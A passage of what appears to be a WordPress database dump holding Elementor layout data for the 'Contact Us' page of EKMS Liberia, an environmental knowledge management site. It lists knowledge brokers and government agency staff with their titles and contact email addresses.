href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b2d79ff\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f970049\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"239344d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"6ab7cf6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"310af85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8523c31\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(19736,2884,'_elementor_controls_usage','a:6:{s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:2:{s:5:\"title\";i:2;s:5:\"align\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:4:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:32;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:29;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:13;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:6:\"layout\";a:2:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:13;}s:17:\"section_structure\";a:1:{s:9:\"structure\";i:10;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:10;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:10;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:4:{s:10:\"text_color\";i:10;s:21:\"typography_typography\";i:9;s:20:\"typography_font_size\";i:9;s:5:\"align\";i:10;}}}}s:6:\"spacer\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_spacer\";a:1:{s:5:\"space\";i:2;}}}}s:5:\"image\";a:3:{s:5:\"count\";i:6;s:15:\"control_percent\";i:4;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_image\";a:7:{s:5:\"image\";i:6;s:10:\"image_size\";i:6;s:22:\"image_custom_dimension\";i:5;s:14:\"caption_source\";i:5;s:7:\"caption\";i:5;s:7:\"link_to\";i:5;s:4:\"link\";i:5;}}s:5:\"style\";a:1:{s:21:\"section_style_caption\";a:2:{s:10:\"text_color\";i:5;s:29:\"caption_typography_typography\";i:1;}}}}}'),(19738,80,'ocean_post_layout','full-width'),(19755,2889,'_elementor_controls_usage','a:0:{}'),(19756,80,'ocean_sidebar','0'),(19757,2890,'_elementor_edit_mode','builder'),(19758,2890,'_elementor_template_type','wp-page'),(19759,2890,'_elementor_version','2.7.5'),(19760,2890,'_wp_page_template','default'),(19761,2890,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"2048x2048\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"J.S. Datuama Cammue\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"caption\":\"Benjamin Karmorh\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BJ-1.jpg\",\"id\":2357},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"Berexford S. Jallah\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"John K. Jallah\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"Kawusu Toure\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong>\\n\\nCoordinator Climate Change Secretariat, EPA\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong><br>\\n\\nEIA Manager, FDA<br>\\n\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b2d79ff\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"